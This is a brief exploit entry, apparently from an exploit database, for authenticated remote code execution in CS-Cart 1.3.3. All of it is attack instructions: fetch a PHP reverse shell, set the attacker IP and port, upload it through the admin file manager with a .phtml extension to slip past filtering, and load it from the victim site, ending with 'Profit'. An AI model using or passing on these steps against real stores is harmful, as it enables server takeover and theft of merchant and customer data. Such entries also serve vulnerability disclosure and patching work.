# Exploit Title: CS-Cart authenticated RCE # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.3 # Vulnerability Type: authenticated RCE get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell edit IP && PORT Upload to file manager change the extension from .php to .phtml visit http://[victim]/skins/shell.phtml --> Profit. ...!